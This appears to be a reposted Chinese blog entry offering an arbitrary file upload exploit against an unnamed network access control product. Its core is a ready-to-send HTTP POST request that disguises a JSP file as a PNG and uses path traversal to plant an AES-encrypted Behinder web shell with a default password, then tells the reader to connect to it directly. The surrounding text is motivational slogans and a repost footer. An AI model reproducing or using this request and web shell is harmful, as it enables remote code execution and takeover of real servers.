當你的才華
還撐不起你的野心時
那你就應該靜下心來學習
目錄
某軟準入是啥樣?
安X任意檔案上傳漏洞EXP(某軟準入)
某軟準入是啥樣?

安X任意檔案上傳漏洞EXP(某軟準入)
POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx
... ...
-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
Content-Type: image/png
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*該密鑰為連接密碼32位md5值的前16位,默認連接密碼rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="uploadpath"
../webapps/notifymsg/devreport/
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

冰蝎直接連

雖然我們生活在陰溝里,但依然有人仰望星空!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qianduan/37325.html
標籤:其他
